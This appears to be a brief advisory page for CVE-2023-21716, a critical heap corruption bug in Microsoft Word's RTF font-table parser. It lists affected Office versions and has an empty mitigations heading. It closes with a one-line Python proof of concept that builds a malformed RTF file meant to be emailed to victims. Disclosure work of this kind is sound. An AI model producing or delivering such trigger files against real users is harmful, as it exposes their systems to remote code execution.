CVE-2023-21716 (Microsoft Word RCE)

CNA: Microsoft Corporation (more like telemetry corporation)

Base Score: 9.8 CRITICAL

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Brief

It is a heap corruption vulnerability in Microsoft Word’s RTF parser that, if triggered, allows attackers to achieve remote code execution with the privileges of the victim.

The flaw does not require prior authentication: attackers can simply send a booby-trapped RTF file to the victim(s) via email.

Details

Affected products

  • Microsoft Office 365 (Insider Preview - 2211 Build 15831.20122 CTR)

  • Microsoft Office 2016 (Including Insider Slow - 1704 Build 8067.2032 CTR)

  • Microsoft Office 2013

  • Microsoft Office 2010

  • Microsoft Office 2007

  • Older versions may also be affected but were not tested. Furthermore, the technical details of this vulnerability have evolved over the years.

Mitigations

PoC

open("exploit.rtf", "wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rt''lch no crash??}\n}}\n").encode('utf-8'))

With email sent

Last updated

Was this helpful?